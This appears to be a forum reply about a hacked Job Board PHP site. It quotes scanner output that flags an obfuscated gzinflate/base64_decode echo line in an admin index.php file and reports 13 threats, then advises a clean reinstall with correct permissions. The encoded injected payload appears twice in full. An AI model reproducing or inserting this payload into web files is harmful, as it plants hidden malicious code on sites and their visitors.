 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/admin/index.php on line 11:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Found 13 threats. Please discuss this on the forum (Opens in a new window)

It looks like your site was compromised by hackers.

Most likely, the file permissions allowed the hackers to write (inject code) to your site. Now your site has malware.

Best if you delete the whole site and install new Job Board from scratch. BUT make sure that the permissions are set properly this time!